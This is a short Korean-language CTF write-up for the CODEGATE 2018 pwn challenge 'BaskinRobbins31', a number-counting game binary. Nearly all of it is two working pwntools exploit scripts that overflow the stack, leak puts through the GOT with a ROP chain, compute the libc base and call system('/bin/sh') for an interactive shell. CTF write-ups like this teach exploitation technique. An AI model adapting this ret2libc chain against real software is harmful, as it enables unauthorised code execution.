WriteUpsPwn

CODEGATE 2018 BaskinRobbins31

⏱ 6 분

BaskinRobbins31

Binary File

[사진 1-1]
우리가 아는 그 베라 게임이다. 하지만 일반적인 방법으로는 이길 수 없다.
[사진 1-2]
필승법으로 이겨보려 하지만 치트를 쓴다. 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *

r = process('./baskin')
e = ELF('./baskin')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = libc.search('/bin/sh').next()
your_turn = e.symbols['your_turn']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x400bc3

payload = ""
payload += "\x90"*184
payload += p64(pr)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(your_turn)
r.sendline(payload)

r.recvuntil("...:(")
r.recvline()

leaked = u64(r.recv(6).ljust(8, "\x00"))
libc_base = leaked - puts_offset
system_addr = libc_base + system_offset
binsh_addr = libc_base + binsh_offset

payload2 = ""
payload2 += "\x90"*184
payload2 += p64(pr)
payload2 += p64(binsh_addr)
payload2 += p64(system_addr)
r.sendlineafter("(1-3)", payload2)
r.recvlines(4)
r.interactive()
[Exploit Code]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *

r = process('./baskin')
e = ELF('./baskin')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = libc.search('/bin/sh').next()
your_turn = e.symbols['your_turn']
puts_plt = e.plt['puts']
puts_got = e.got['puts']
pr = 0x400bc3

def leak():
    global leaked
    payload = ""
    payload += "\x90"*184
    payload += p64(pr)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(your_turn)
    r.sendline(payload)
    r.recvuntil("...:(")
    r.recvline()
    leaked = u64(r.recv(6).ljust(8, "\x00"))

def offset():
    global system_addr, binsh_addr
    libc_base = leaked - puts_offset
    system_addr = libc_base + system_offset
    binsh_addr = libc_base + binsh_offset

def exploit():
    payload2 = ""
    payload2 += "\x90"*184
    payload2 += p64(pr)
    payload2 += p64(binsh_addr)
    payload2 += p64(system_addr)
    r.sendlineafter("(1-3)", payload2)
    r.recvlines(4)
    r.interactive()

if __name__ == "__main__":
    leak()
    offset()
    exploit()
[Exploit Code #2]
공유하기